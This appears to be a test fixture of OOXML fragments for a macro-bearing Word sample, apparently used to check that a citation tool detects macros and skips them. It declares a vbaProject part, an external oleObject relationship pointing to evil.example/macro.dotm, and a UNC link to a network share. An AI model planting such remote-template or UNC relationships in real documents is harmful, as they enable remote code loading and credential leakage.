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Macro Carriage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This document carries a vbaProject part that the reader must never execute.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  <Relationship Id="rIdVba" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>
  <Relationship Id="rIdExt" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://evil.example/macro.dotm" TargetMode="External"/>
  <Relationship Id="rIdUnc" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\nas.example\share\template.dotx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Macro-bearing sample (note-and-skip)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Macro-bearing sample (note-and-skip)</dc:title>
  <dc:creator>CiteSync Fixtures</dc:creator>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-15T10:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-20T08:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>